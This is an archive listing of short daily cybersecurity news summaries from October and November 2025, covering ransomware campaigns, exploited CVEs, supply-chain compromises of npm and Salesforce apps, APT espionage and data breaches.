This cybersecurity brief for November 29, 2025, covers a series of high-impact attacks led by the Qilin ransomware group, including a massive data breach at Japanese beverage giant Asahi affecting nearly 2 million individuals and a sophisticated supply-chain attack that compromised 28 South Korean financial firms. Additional major events include espionage campaigns by APT groups Bloody Wolf and APT36, data breaches at Under Armour and DoorDash, and a cloud misconfiguration incident at Oracle. The period was marked by significant ransomware activity, nation-state espionage, and supply chain vulnerabilities.

Nov 28, 20259 articles

Supply Chain Attacks Surge as North Korean Hackers Flood NPM; CISA Issues Urgent Mobile & ICS Alerts

This cybersecurity advisory for November 27-28, 2025, highlights a significant escalation in software supply chain attacks, underscored by a North Korean campaign that flooded the NPM registry with nearly 200 malicious packages. Concurrently, CISA has issued critical warnings, adding an exploited ICS vulnerability (CVE-2021-26829) to its KEV catalog and releasing urgent guidance for mobile device security against commercial spyware. Other major incidents include a data breach at the French Football Federation exposing player information, a massive leak of over 17,000 secrets on public GitLab repositories, and evolving tactics from APT groups like Bloody Wolf and Tomiris targeting government entities across Central Asia.

Nov 27, 20258 articles

Ransomware Cripples US Emergency Alerts and London Councils; Critical Flaws in Azure and Oracle Under Active Attack

This cybersecurity brief for November 26-27, 2025, covers a series of high-impact ransomware attacks and critical vulnerability disclosures. The Inc Ransom group disrupted the CodeRED emergency alert system across the U.S., while a separate attack crippled services for three London councils. The Akira ransomware gang claimed attacks on five North American firms. Concurrently, CISA issued warnings for actively exploited vulnerabilities in Oracle Identity Manager (CVE-2025-61757) and spyware targeting messaging apps. A critical CVSS 10.0 authentication bypass flaw (CVE-2025-49752) was also discovered in Microsoft's Azure Bastion service, highlighting significant risks in both public infrastructure and cloud environments.

Nov 26, 20256 articles

CodeRED Emergency Alerts Downed by Ransomware; Major Banks Hit in Supply Chain Breach; Russia & North Korea APTs Collaborate

This cybersecurity brief for November 26, 2025, covers several critical incidents. A ransomware attack by the 'Inc Ransom' group has crippled the OnSolve CodeRED emergency alert system across the U.S., disrupting a vital public safety tool. In a major supply chain breach, financial tech vendor SitusAMC exposed sensitive data from top banks like JPMorgan Chase and Citi. Security researchers uncovered an unprecedented collaboration between Russian (Gamaredon) and North Korean (Lazarus) state-sponsored hacking groups using shared infrastructure. Additionally, a new, more destructive version of the 'Shai-Hulud' npm worm is causing widespread compromise, and CISA has issued warnings about spyware targeting Signal/WhatsApp users and multiple vulnerabilities in industrial control systems.

Nov 25, 20256 articles

Massive 'Sha1-Hulud' Supply Chain Attack Compromises 25,000+ GitHub Repos; CISA Warns of Multiple Actively Exploited Zero-Days

This intelligence briefing for November 25, 2025, covers a massive software supply chain attack named 'Sha1-Hulud' that has compromised over 25,000 GitHub repositories via malicious npm packages. Additionally, CISA has issued directives for actively exploited zero-day vulnerabilities in Oracle Identity Manager, Google Chrome, and Fortinet's FortiWeb. Other major threats include the Akira ransomware group targeting M&A activities, a surge in Black Friday phishing scams, and a data breach at a major banking vendor, SitusAMC.

Nov 24, 20252 articles

Supply Chain Attacks Cripple NPM and Salesforce; FCC Rolls Back ISP Security Rules

This 24-hour period saw a surge in high-impact supply chain attacks, with the 'Shai-Hulud' worm infecting hundreds of NPM packages and a breach at Gainsight exposing Salesforce customer data. Concurrently, a major cyberattack hit a key US mortgage vendor, and the FCC controversially rescinded ISP cybersecurity rules amidst ongoing nation-state threats. Ransomware and espionage campaigns also continue, with Akira hitting LG and a new APT, 'Autumn Dragon,' targeting Southeast Asia.

Nov 23, 20258 articles

Zero-Day Exploits Rock Oracle and Chrome; APTs Uncovered in Multi-Year Espionage Campaigns

This cybersecurity brief for November 23, 2025, covers a tumultuous period marked by the active exploitation of zero-day vulnerabilities in Oracle E-Business Suite by the Cl0p ransomware gang and in Google Chrome. Concurrently, researchers have exposed long-running cyberespionage campaigns by APT24 and APT31, which utilized sophisticated supply chain attacks and cloud-based C2 infrastructure. Other major incidents include a record-breaking 15.72 Tbps DDoS attack mitigated by Microsoft, a critical CVSS 10.0 vulnerability in Grafana Enterprise, and a series of data breaches impacting Harvard University, CrowdStrike, and Salesforce customers via a supply chain attack on Gainsight.

Nov 22, 20253 articles

Massive Supply Chain Attack Hits Salesforce Ecosystem; Critical Flaws in Oracle, Azure, and Grafana Emerge

This cybersecurity brief for November 22, 2025, covers a series of high-impact events. A major supply chain attack attributed to 'Scattered Lapsus$ Hunters' compromised over 200 companies by abusing OAuth tokens in a Salesforce-integrated app. Concurrently, CISA issued warnings for a critical, actively exploited RCE in Oracle Identity Manager. Critical 10.0 CVSS vulnerabilities were also disclosed in Microsoft Azure Bastion and Grafana Enterprise. Other significant threats include a new Android trojan stealing encrypted messages, a sophisticated Chinese APT campaign targeting Russia, and a botnet using the Ethereum blockchain for C2.

Nov 21, 20256 articles

ShinyHunters Breaches Salesforce Ecosystem via Gainsight; SEC Drops Landmark SolarWinds Lawsuit

This cybersecurity brief for November 20-21, 2025, covers major incidents including a ShinyHunters-led supply chain attack on Salesforce customers via the Gainsight app, the SEC's surprising dismissal of its lawsuit against SolarWinds and its CISO, and Microsoft's patching of an actively exploited Windows Kernel zero-day. Other key developments include a new SANS report on rising OT/ICS threats, the INC ransomware group targeting a Burj Khalifa fire-safety provider, and new cybersecurity regulations proposed in the UK.

Nov 20, 20255 articles

CISA Mandates Urgent Patching for Actively Exploited Fortinet, Chrome, and Windows Zero-Days

This cybersecurity brief for November 20, 2025, covers a series of critical zero-day vulnerabilities under active exploitation, prompting emergency directives from CISA. Key advisories include a Fortinet FortiWeb command injection flaw (CVE-2025-58034), a Windows Kernel privilege escalation bug (CVE-2025-62215), and a Google Chrome RCE vulnerability (CVE-2025-13223), all added to the KEV catalog. Additionally, this report details ransomware attacks by the 'sinobi' and 'Inc Ransom' groups, new CISA guidance on bulletproof hosting and drone threats, and research on the surge in AI-driven cyberattacks and a new macOS infostealer.

Nov 19, 20256 articles

Google Patches Actively Exploited Chrome Zero-Day as Ransomware Cripples PA Attorney General's Office

This cybersecurity brief for November 19, 2025, covers a critical period marked by urgent zero-day patching and high-stakes ransomware attacks. Google rushed to fix the seventh actively exploited Chrome zero-day of the year (CVE-2025-13223), a type confusion bug in the V8 engine. Concurrently, the Pennsylvania Attorney General's office confirmed a major data breach by the Inc Ransom group, who exploited a Citrix vulnerability to exfiltrate 5.7 TB of sensitive data. Other significant events include CISA adding a Fortinet FortiWeb flaw to its KEV catalog, international sanctions against a Russian bulletproof hosting network, and multiple data breaches affecting DoorDash and healthcare providers due to phishing and supply chain weaknesses.

Nov 18, 20258 articles

AI-Orchestrated Cyber Espionage Uncovered; Logitech Breached by Clop; Google Patches Actively Exploited Chrome Zero-Day

This intelligence brief for November 18, 2025, covers a landmark AI-driven espionage campaign by a Chinese state actor, a major data breach at Logitech by the Clop ransomware gang exploiting an Oracle zero-day, and an emergency patch from Google for an actively exploited Chrome vulnerability. Additional reports detail critical flaws in WordPress plugins, a defacement attack on Kenyan government websites, and a massive DDoS attack on critical infrastructure.

Nov 17, 20256 articles

Jaguar Land Rover Reels from £680M Cyberattack Loss; Cl0p Exploits Oracle Zero-Day in Massive Campaign

This intelligence brief for November 16-17, 2025, covers a series of high-impact cyber events. Key incidents include Jaguar Land Rover's staggering £680 million loss from a production-halting cyberattack, a widespread campaign by the Cl0p ransomware gang exploiting an Oracle E-Business Suite zero-day to breach Logitech and others, and the introduction of a sweeping new cybersecurity bill in the UK. Other major events include the discovery of 150,000 malicious NPM packages in a crypto-farming scheme, an actively exploited Windows Kernel zero-day patch from Microsoft, and multiple data breaches affecting DoorDash and Eurofiber.

Nov 16, 20256 articles

CISA Warns of Actively Exploited Fortinet Zero-Day; FBI Details Akira Ransomware's $250M Spree

In cybersecurity news for November 15-16, 2025, the landscape is dominated by the active exploitation of a critical zero-day vulnerability (CVE-2025-64446) in Fortinet's FortiWeb WAF, prompting an emergency directive from CISA. Concurrently, the FBI and CISA issued a stark warning about the Akira ransomware gang, which has extorted nearly $250 million from critical infrastructure sectors by exploiting VPNs. Other major developments include the discovery of an APT using two zero-days against Cisco and Citrix systems, a proposed overhaul of UK cybersecurity law, and a documented 30% surge in ransomware attacks in October, highlighting the rise of new groups like Qilin and Sinobi.

Nov 15, 20257 articles

Akira Ransomware Escalates Attacks as Flurry of Zero-Days Hits Microsoft, Fortinet, and Cisco

For the period of November 14-15, 2025, the cybersecurity landscape was dominated by the escalating threat of the Akira ransomware group, which has now extorted over $244 million and is actively targeting critical infrastructure with new exploits. Simultaneously, a wave of critical, actively exploited zero-day vulnerabilities impacted major enterprise vendors including Microsoft, Fortinet, and Cisco, prompting urgent patching directives from CISA. Other significant developments include a state-sponsored campaign weaponizing AI for espionage, an unverified but high-impact claim by the Clop gang against the UK's NHS, and a massive supply chain attack flooding the NPM registry with over 150,000 malicious packages for a novel token-farming scheme.

Nov 14, 20256 articles

Global Cybercrime Disrupted by 'Operation Endgame'; Cl0p Breaches Entrust with Oracle Zero-Day

This reporting period for November 14, 2025, is dominated by major law enforcement actions and high-stakes cyberattacks. A global coalition led by Europol executed 'Operation Endgame,' dismantling over 1,000 servers tied to prolific malware families. Concurrently, the Cl0p ransomware group exploited a critical Oracle zero-day to breach security firm Entrust. Microsoft also patched an actively exploited Windows Kernel zero-day, while CISA issued an updated warning on the evolving Akira ransomware, which now targets Nutanix virtual machines.

Nov 13, 20258 articles

Microsoft Patches Actively Exploited Windows Zero-Day as Global Law Enforcement Dismantles Major Cybercrime Rings

In a critical 24-hour period ending November 13, 2025, the cybersecurity landscape was dominated by Microsoft's emergency patch for an actively exploited Windows Kernel zero-day (CVE-2025-62215) and a major international law enforcement action, 'Operation Endgame,' which dismantled the infrastructure of several malware-as-a-service operations. Other significant events include the discovery of an APT exploiting Cisco and Citrix zero-days, the introduction of a sweeping new cyber resilience bill in the UK, and CISA's addition of newly exploited vulnerabilities to its KEV catalog.

Nov 12, 20256 articles

Microsoft Patches Actively Exploited Windows Zero-Day; Advanced Actors Target Cisco and Citrix in New Campaigns

In cybersecurity news for November 12, 2025, Microsoft has released its November Patch Tuesday update, addressing a critical Windows Kernel zero-day (CVE-2025-62215) under active exploitation. Concurrently, Amazon's threat intelligence team revealed that an advanced threat actor is exploiting new zero-days in Cisco ISE and Citrix NetScaler. Major developments also include a sweeping new cybersecurity bill in the UK, a crippling ransomware attack on Asahi Breweries in Japan, and the Clop ransomware gang claiming an attack on Dartmouth College. Other significant events involve a large-scale phishing campaign abusing Facebook's infrastructure and new NYDFS compliance deadlines taking effect.

Nov 11, 20256 articles

Triofox Zero-Day Exploited In-the-Wild; CMMC Enforcement Begins for DoD Contractors

This cybersecurity brief for November 11, 2025, covers several critical developments. A zero-day in Gladinet's Triofox (CVE-2025-12480) is being actively exploited for remote code execution. CISA added a zero-click Samsung mobile flaw (CVE-2025-21042) to its KEV catalog following active exploitation. The DoD has officially begun CMMC enforcement for its contractors. Other major incidents include a destructive campaign by the KONNI APT against Android users, and significant data breaches at Nikkei and Hyundai AutoEver.

Nov 10, 20256 articles

China's Cyber Arsenal Exposed in Massive Leak; Critical Flaws Threaten QNAP, Docker, and Kubernetes

This cybersecurity brief for November 10, 2025, covers a series of high-impact events. A catastrophic data breach at Chinese firm Knownsec has exposed state-sponsored hacking tools and global target lists. Concurrently, critical zero-day vulnerabilities are forcing urgent patches for QNAP NAS devices and the runC container runtime, which underpins Docker and Kubernetes. Other major incidents include a significant data breach affecting 1.5 million Swedes, a cyberattack on the U.S. Congressional Budget Office, and new regulatory rollouts from the DoD and guidance from the OWASP Foundation.

Nov 9, 20257 articles

Clop Ransomware Breaches Washington Post; Critical Flaws Found in Docker, QNAP, and AI Models

This cybersecurity brief for November 9, 2025, covers a series of high-impact events. The Clop ransomware group has been confirmed as the perpetrator behind a major breach at The Washington Post, exploiting Oracle E-Business Suite vulnerabilities in a campaign affecting over 100 organizations. Concurrently, Microsoft revealed a novel 'Whisper Leak' side-channel attack capable of inferring AI chat topics from encrypted traffic. Critical vulnerabilities have also emerged, with the GlassWorm malware resurfacing in the VSCode marketplace, QNAP patching seven zero-days from Pwn2Own, and newly disclosed flaws in the runC container runtime threatening Docker and Kubernetes environments. These incidents highlight escalating threats across enterprise software, AI platforms, and cloud infrastructure.

Nov 8, 20257 articles

Samsung Zero-Day Exploited by LANDFALL Spyware; Sandworm Escalates Destructive Attacks on Ukraine

This cybersecurity publication for November 8, 2025, covers a critical period marked by sophisticated mobile espionage, escalating nation-state attacks, and a record surge in supply chain compromises. Key stories include the discovery of the LANDFALL spyware using a Samsung zero-day for zero-click attacks in the Middle East, a new report detailing Russia's Sandworm group intensifying destructive wiper attacks against Ukraine's critical infrastructure, and data showing software supply chain attacks hit an all-time high in October, driven by ransomware gangs like Qilin.

Nov 7, 20257 articles

Cisco Firewalls Under Siege by New DoS Attacks; AI Supercharges Ransomware Campaigns

In the period covering November 6-7, 2025, the cybersecurity landscape was dominated by new attack variants targeting critical Cisco firewall vulnerabilities, causing persistent denial-of-service conditions. Concurrently, reports emerged detailing how threat actors are leveraging AI to drastically shorten ransomware attack timelines, with Europe becoming a primary target. Other major developments include a sophisticated global phishing campaign against Booking.com users, the discovery of Android spyware delivered via a Samsung zero-day, and a record-breaking month for software supply chain attacks driven by ransomware groups like Qilin and Akira.

Nov 6, 20257 articles

AI-Powered Malware Emerges as Critical Zero-Click Flaw Hits Billions of Android Devices

This cybersecurity brief for November 6, 2025, covers a landmark shift in the threat landscape with Google's discovery of AI-powered malware like PROMPTFLUX, which uses LLMs to mutate its own code. Concurrently, a critical zero-click RCE vulnerability (CVE-2025-48593) was disclosed for Android versions 13-16, posing a severe risk to billions of users. Other major incidents include the Qilin ransomware gang's claimed breach of Habib Bank AG Zurich, a cyberattack on the U.S. Congressional Budget Office, and a supply chain attack by Cl0p impacting The Washington Post via an Oracle zero-day.

Nov 5, 20257 articles

Critical Infrastructure Under Fire: CISA Warns of Major ICS Flaws, State-Sponsor Breaches F5 BIG-IP

This cybersecurity brief for November 5, 2025, covers a series of high-stakes threats targeting critical infrastructure and enterprise security. CISA has disclosed severe vulnerabilities in industrial control systems from five vendors, while a state-sponsored actor has breached F5, compromising its BIG-IP source code and creating a significant supply chain risk. Other major developments include the evolution of the DragonForce ransomware group into a 'cartel' with ties to Scattered Spider, the indictment of cybersecurity insiders for deploying BlackCat ransomware, and a massive data breach at a Swedish IT firm exposing 1.5 million individuals' data. These events underscore the growing threats to OT environments, the sophistication of ransomware actors, and the persistent danger of insider threats and cloud misconfigurations.

Nov 4, 20256 articles

Insider Threats, Zero-Days, and Ransomware Shake Global Cybersecurity Landscape

This 24-hour cybersecurity brief for November 4, 2025, covers critical developments including the indictment of cybersecurity professionals for running a BlackCat ransomware ring, a severe zero-click RCE in Android, and a new Cl0p campaign exploiting an Oracle zero-day. Reports also highlight the emergence of the Conti-derived DragonForce ransomware and the massive financial fallout for SK Telecom after a major data breach.

Nov 3, 20255 articles

Chinese APT 'Airstalk' Malware Targets BPO Supply Chains; Insider Threats and Cl0p Zero-Day Exploits Escalate

This cybersecurity brief for November 3rd, 2025, covers a surge in sophisticated threats. Key developments include the discovery of 'Airstalk,' a new Chinese APT malware using MDM APIs for C2 in supply chain attacks against the BPO sector. In a shocking insider threat case, cybersecurity professionals were indicted for using ALPHV/BlackCat ransomware. The Cl0p ransomware group is actively exploiting an Oracle zero-day (CVE-2025-61882), while an unpatched Windows LNK flaw (CVE-2025-9491) continues to be leveraged by APTs. Additionally, new reports highlight advanced phishing on LinkedIn, the massive financial fallout from the SK Telecom breach, and escalating ransomware attacks across Europe.

Nov 2, 20257 articles

Penn Breach Exposes 1.2M Records; Critical Android Zero-Click & Chinese APTs Target Zero-Days

This cybersecurity brief for November 2nd, 2025, covers a series of high-impact security incidents. A massive data breach at the University of Pennsylvania has allegedly exposed 1.2 million donor records. Google has issued an urgent patch for a critical zero-click RCE vulnerability in Android. Meanwhile, Chinese state-sponsored threat actors, including Bronze Butler and UNC6384, are actively exploiting zero-day vulnerabilities in Lanscope and Windows systems to deploy malware and spy on targets in Europe and Asia. Other significant events include a major data breach at a Polish loan company and an Australian government warning about new malware targeting Cisco devices.

Nov 1, 20258 articles

China-Linked Actors Exploit Windows & VMware Zero-Days; Ransomware Gangs Hit Major Corporations

This cybersecurity brief for November 1, 2025, covers a surge in state-sponsored cyber-espionage and critical zero-day exploitation. Chinese-linked threat actors are actively leveraging an unpatched Windows vulnerability (CVE-2025-9491) to spy on European diplomats and a now-patched VMware flaw (CVE-2025-41244) for privilege escalation. Concurrently, ransomware remains a dominant threat, with the Akira group claiming a breach at Apache OpenOffice, RansomHouse hitting Japanese retailer Askul, and a massive data breach at Conduent affecting over 10.5 million individuals. Other significant developments include the discovery of new malware families 'KYBER' and 'Airstalk', a supply chain attack on the npm registry, and an ongoing campaign targeting Cisco devices in Australia.

Oct 31, 20257 articles

PhantomRaven Supply Chain Attack Hits npm; Conduent Breach Exposes 10.5M; CISA Flags Actively Exploited Flaws

This cybersecurity brief for October 31, 2025, covers a surge in sophisticated threats. Highlights include the 'PhantomRaven' supply chain attack on npm using novel evasion techniques, a massive data breach at Conduent affecting 10.5 million individuals, and CISA adding critical, actively exploited vulnerabilities in XWiki and VMware to its KEV catalog. Other major incidents include a prolonged nation-state breach at a key telecom provider, a significant Azure outage, and escalating ransomware campaigns from the Qilin group.

Oct 30, 20257 articles

Microsoft Azure Outage Causes Global Chaos; CISA Warns of Actively Exploited WSUS Flaw

This cybersecurity brief for October 30, 2025, covers a widespread Microsoft Azure outage triggered by a configuration error, a critical CISA alert for an actively exploited Windows Server vulnerability (CVE-2025-59287), and massive data breaches at government contractor Conduent and consulting giant EY. New threats include the 'Herodotus' Android malware and the 'logins[.]zip' infostealer, while the UK government considers a ransomware payment ban in response to escalating attacks.

Oct 29, 20256 articles

Urgent WSUS Patch Mandated Amidst Wave of Zero-Day Exploits Targeting Oracle, Chrome, and AI Agents

This cybersecurity brief for October 29, 2025, covers a series of critical threats, led by an urgent CISA directive to patch an actively exploited, wormable RCE vulnerability in Windows Server Update Services (CVE-2025-59287). The threat landscape is further defined by major zero-day attacks, with the FIN11/Clop ransomware group targeting Oracle EBS systems at industrial giants, and the 'Mem3nt0 mori' APT exploiting a Chrome zero-day. New malware strains have also emerged, including 'Airstalk' in a suspected nation-state supply chain attack and 'Herodotus', an Android trojan that mimics human behavior. Additionally, a report highlights the destructive impact of the 'Scattered Spider' group and a massive surge in AI-powered vishing attacks.

Oct 28, 20257 articles

Actively Exploited WSUS Flaw Triggers Emergency Patch; Qilin Ransomware Becomes 2025's Top Threat

This cybersecurity brief for October 28, 2025, covers several critical developments. Microsoft is scrambling to contain an actively exploited RCE vulnerability in WSUS (CVE-2025-59287) after a botched patch, forcing an emergency update. In the ransomware landscape, the Qilin group has surged to become the most prolific threat of 2025 with over 700 attacks, while payment rates have hit a record low. Other major incidents include a data breach at Sweden's power grid operator claimed by the Everest gang, a massive leak of 4.8 million patient records from Kenya's M-TIBA health platform, and new CISA alerts for critical flaws in industrial control systems and endpoint management software.

Oct 27, 202510 articles

Microsoft Scrambles to Patch Actively Exploited WSUS Flaw as Qilin Ransomware Surges

In cybersecurity news for October 27, 2025, Microsoft issued an emergency patch for a critical, actively exploited remote code execution vulnerability in Windows Server Update Services (WSUS). Concurrently, reports indicate the Qilin ransomware group has become the most prolific operator of 2025, claiming over 700 victims. Other major incidents include a massive China-linked smishing campaign using over 194,000 domains, active exploitation of a critical flaw in Adobe Commerce, and a series of data breaches affecting the retail and healthcare sectors.

Oct 26, 20256 articles

Microsoft Scrambles to Patch Actively Exploited WSUS Flaw; Dublin Airport Breach Hits 3.8M

This cybersecurity brief for October 26, 2025, covers several critical global incidents. A severe, actively exploited remote code execution vulnerability (CVE-2025-59287) in Microsoft's WSUS has prompted an emergency out-of-band patch, with CISA mandating immediate action. In a massive supply chain attack, Dublin Airport disclosed a data breach affecting 3.8 million passengers after a third-party provider, Collins Aerospace, was compromised by ransomware. Meanwhile, a DDoS attack on Russia's food safety agency crippled national supply chains, the Safepay ransomware group targeted a German video surveillance firm, and dozens of nations signed a landmark, albeit controversial, UN cybercrime treaty in Hanoi.

Oct 25, 20252 articles

CISA Issues Emergency Directive for Actively Exploited Microsoft WSUS Flaw; Ransomware Surges 50% in 2025

This cybersecurity brief for October 25, 2025, covers critical developments, led by an emergency CISA directive for an actively exploited remote code execution vulnerability (CVE-2025-59287) in Microsoft's Windows Server Update Service (WSUS). Other major stories include Microsoft's massive October Patch Tuesday fixing 193 flaws and six zero-days, a reported 50% surge in ransomware attacks in 2025 driven by new groups like Qilin, the resurgence of the LockBit ransomware gang with a new 'LockBit 5.0' variant, and a massive 'Smishing Triad' campaign using over 194,000 malicious domains. Global policy shifts are also noted, with the UK and Singapore launching a supply chain security initiative and the UN finalizing its Convention against Cybercrime.

Oct 24, 20258 articles

Critical WSUS Zero-Day Exploited, Prosper Breach Hits 17.6M, and Iranian APT Deploys 'Phoenix' Backdoor

This reporting period, October 23-24, 2025, has been marked by significant and active threats. A critical, actively exploited zero-day vulnerability (CVE-2025-59287) in Microsoft's WSUS has prompted an emergency patch and a CISA KEV alert, posing a severe risk to enterprise networks. In the financial sector, a massive data breach at Prosper Marketplace has exposed the highly sensitive personal and financial data of 17.6 million users. Concurrently, nation-state activity surged with an Iranian-linked APT group targeting over 100 government institutions globally using a new 'Phoenix' backdoor. Other major incidents include Google patching its sixth actively exploited Chrome zero-day of the year and multiple high-impact ransomware attacks affecting manufacturing, education, and critical infrastructure sectors.

Oct 23, 202510 articles

Ransomware Automation Slashes Attack Times to Minutes; Supply Chain Overconfidence Creates Massive Risk

In cybersecurity news for October 23, 2025, the threat landscape is defined by escalating speed and systemic risk. A new report reveals ransomware groups are using automation to compress attack timelines to just 18 minutes from initial access to lateral movement. Simultaneously, another study highlights a dangerous overconfidence in supply chain security, with 94% of firms feeling prepared despite a third failing to conduct basic supplier risk assessments. This is underscored by the staggering £1.9 billion economic cost of the Jaguar Land Rover hack, which cascaded through 5,000 supply chain organizations. Regulators are responding, with New York's DFS issuing new guidance on third-party risk. Meanwhile, CISA has added another actively exploited vulnerability to its KEV catalog, demanding immediate action from federal agencies.

Oct 22, 20257 articles

Ransomware Surges, JLR Hack Costs UK £1.9B, and 'GlassWorm' Hits Developers in Widespread Attacks

This cybersecurity advisory for October 21-22, 2025, covers a dramatic 34% surge in ransomware attacks against global critical infrastructure, with the U.S. being the top target. A separate analysis reveals the staggering economic fallout of a cyberattack on Jaguar Land Rover, costing the UK economy an estimated £1.9 billion. A sophisticated new worm, 'GlassWorm', is spreading through the VS Code ecosystem using invisible code to infect developers. Additionally, critical vulnerabilities have been disclosed in the Netty Java library and Oracle's E-Business Suite, while the UK government issues an urgent call for businesses to bolster defenses.

Oct 21, 20254 articles

Citrix Zero-Day Hits US Gov; APTs & Sophisticated Malware Campaigns Surge Globally

This intelligence brief for October 21, 2025, covers a series of high-impact cybersecurity events. A critical Citrix zero-day, 'CitrixBleed 2.0', led to a major data breach at the U.S. Department of Homeland Security, exposing employee data. Nation-state activity remains high, with China-linked Salt Typhoon targeting European telecoms and Russia-linked COLDRIVER rapidly deploying new malware after public disclosure. A novel supply chain attack, 'GlassWorm', is targeting VS Code developers using advanced obfuscation and a blockchain-based C2. Meanwhile, new reports highlight a 34% surge in ransomware attacks on critical infrastructure and the growing challenge of AI-powered cyberattacks outpacing organizational defenses.

Oct 20, 20258 articles

CISA Mandates Patches for Exploited Flaws; Nation-State Actors Breach F5 and Prosper Suffers Massive Data Leak

This cybersecurity brief for October 20, 2025, covers a series of high-impact events. CISA has added five actively exploited vulnerabilities to its KEV catalog, mandating urgent patching. In a significant supply-chain threat, a nation-state actor breached F5, stealing BIG-IP source code. Meanwhile, the Prosper lending platform disclosed a massive data breach affecting 17.6 million users, and the Cl0p ransomware gang is exploiting a new zero-day in Oracle E-Business Suite. These incidents highlight escalating threats across patch management, supply chain security, and data protection.

Oct 19, 20259 articles

Europol Busts 'SIMCARTEL' CaaS Network; Everest Ransomware Claims Collins Aerospace Attack

This cybersecurity brief for October 19, 2025, covers major international law enforcement actions, high-profile ransomware claims, and critical vulnerability disclosures. Key events include the dismantling of the 'SIMCARTEL' Cybercrime-as-a-Service platform in Europe, the Everest ransomware group claiming responsibility for the disruptive Collins Aerospace attack, and Microsoft's revocation of over 200 malicious certificates used by the Vanilla Tempest group. Additionally, CISA has issued warnings for two actively exploited Windows zero-day vulnerabilities, and a critical RCE flaw has been patched in Microsoft WSUS.

Oct 18, 20256 articles

Nation-State Actors Breach F5 Networks Stealing BIG-IP Source Code; AI Phishing Effectiveness Skyrockets

This cybersecurity brief for October 18, 2025, covers a critical supply chain attack against F5 Networks by a nation-state actor, resulting in the theft of BIG-IP source code and unpatched vulnerability data. Other major developments include a Microsoft report revealing AI-powered phishing is 4.5 times more effective, active exploitation of a Cisco zero-day to deploy rootkits, and the Clop ransomware group breaching an American Airlines subsidiary via Oracle EBS flaws. The period also saw rising ransomware attacks targeting healthcare and increased warnings about supply chain security from the UK's NCSC.

Oct 17, 20259 articles

Microsoft Patches Three Zero-Days, F5 Suffers Nation-State Breach, and Critical Adobe Flaw Actively Exploited

This cybersecurity brief for October 17, 2025, covers a massive Microsoft Patch Tuesday addressing over 172 vulnerabilities, including three actively exploited zero-days. In other major news, F5 Networks disclosed a significant breach by a nation-state actor resulting in source code theft, and CISA issued an urgent warning for a critical, actively exploited Adobe AEM vulnerability with a 10.0 CVSS score. Additional stories include a massive data breach at lending platform Prosper affecting 17.6 million users, a surge in AKIRA ransomware attacks targeting Swiss companies, and new regulatory pressures from a stricter data breach notification law in California.

Oct 16, 20258 articles

CISA Emergency Directive Issued After F5 Source Code Theft by Nation-State Actor; Microsoft Patches Four Actively Exploited Zero-Days

This cybersecurity brief for October 16, 2025, covers a critical supply chain threat following the theft of F5 source code by a Chinese nation-state actor, prompting a CISA emergency directive. Concurrently, Microsoft's October Patch Tuesday addresses over 170 flaws, including four actively exploited zero-days. Other major events include the disruption of a ransomware campaign using signed malware, the discovery of a Chinese APT targeting a Russian IT firm, a massive data breach affecting two major airlines, and the disclosure of critical flaws in industrial control systems.

Oct 15, 20255 articles

Microsoft Patches 172 Flaws and Six Zero-Days; F5 Discloses Nation-State Breach Stealing BIG-IP Source Code

This intelligence briefing for October 15, 2025, covers a massive Microsoft Patch Tuesday addressing 172 vulnerabilities, including three actively exploited zero-days. A critical supply chain threat emerges as F5 discloses a long-term breach by a nation-state actor who stole BIG-IP source code, prompting a CISA emergency directive. Other major developments include the return of the LockBit ransomware group with an upgraded version, a surge in overall ransomware attacks, and multiple data breach and vulnerability disclosures affecting companies like Canadian Tire and Fortinet.

Oct 14, 20256 articles

Microsoft's Massive October Patch Tuesday Fixes 175 Flaws and 3 Zero-Days; F5 Discloses Nation-State Breach

This cybersecurity advisory for October 14, 2025, covers a record-breaking Microsoft Patch Tuesday addressing 175 vulnerabilities, including three actively exploited zero-days. Additionally, F5 disclosed a major breach by a nation-state actor, resulting in the theft of BIG-IP source code and a CISA emergency directive. Other significant events include new campaigns by Chinese APTs Flax Typhoon and Jewelbug, a novel phishing attack abusing NPM infrastructure, and ongoing ransomware activity from the Qilin group.

Oct 13, 20257 articles

Critical Oracle Zero-Day Exploited by TA505 & Cl0p; Discord Vendor Breach Exposes 70,000 IDs

This cybersecurity brief for October 13, 2025, covers a critical zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite being actively exploited by major extortion groups, leading to widespread data theft. Other significant events include a major data breach at a Discord third-party vendor exposing 70,000 user IDs, a novel phishing campaign abusing NPM infrastructure, and a report showing a 30% surge in ransomware attacks against healthcare vendors.

Oct 12, 20258 articles

Massive Supply Chain Attacks Expose Millions; Clop Ransomware Targets Harvard and Oracle

In the period covering October 12, 2025, the cybersecurity landscape was dominated by large-scale supply chain attacks and aggressive ransomware campaigns. A hacker collective dubbed 'Scattered Lapsus$ Hunters' leaked data for 5.7 million Qantas customers and 7.3 million Vietnam Airlines customers after compromising a shared Salesforce environment. Concurrently, the Clop ransomware gang claimed a breach of Harvard University and was found actively exploiting a zero-day in Oracle E-Business Suite, for which Oracle released an emergency patch for a separate, newly discovered high-severity flaw. Other significant events include the abuse of the Velociraptor DFIR tool to deploy ransomware and reports of North Korean hackers stealing a record $2 billion in crypto assets in 2025.

Oct 11, 20257 articles

Critical Flaws in Oracle & Redis Under Active Threat; Widespread Supply Chain Attacks Target Developers and Cloud Services

This intelligence briefing for October 11, 2025, covers a series of critical cybersecurity incidents. Major themes include the active exploitation of a zero-day in Oracle E-Business Suite by the Cl0p ransomware group and the patching of a 13-year-old RCE flaw in Redis. Supply chain attacks remain a dominant threat, with malicious npm and Node.js packages targeting developers, and a Discord breach originating from a third-party vendor. SonicWall disclosed two major incidents: active exploitation of its VPNs by Akira ransomware and a full-scale breach of its Cloud Backup service affecting all customers. Additionally, new malware strains like 'Chaosbot' and the AI-powered 'MalTerminal' demonstrate evolving attacker TTPs.

Oct 10, 20258 articles

Cl0p Exploits Oracle Zero-Day in Massive Extortion Spree; SonicWall Breach Hits All Cloud Backup Users

This cybersecurity brief for October 10, 2025, covers a critical period marked by high-impact zero-day exploitation and significant data breaches. A Cl0p-affiliated group has been exploiting an Oracle E-Business Suite zero-day (CVE-2025-61882) for months, leading to an FBI warning. Concurrently, SonicWall admitted a breach impacted all cloud backup customers, exposing firewall configurations. Other major incidents include the 'CamoLeak' flaw in GitHub Copilot allowing code exfiltration, a supply chain breach at crypto platform Shuffle.com, and the emergence of new ransomware and APT groups.

Oct 9, 20259 articles

Cl0p Exploits Oracle Zero-Day; Threat Actors Weaponize Legitimate Security Tools in Widespread Attacks

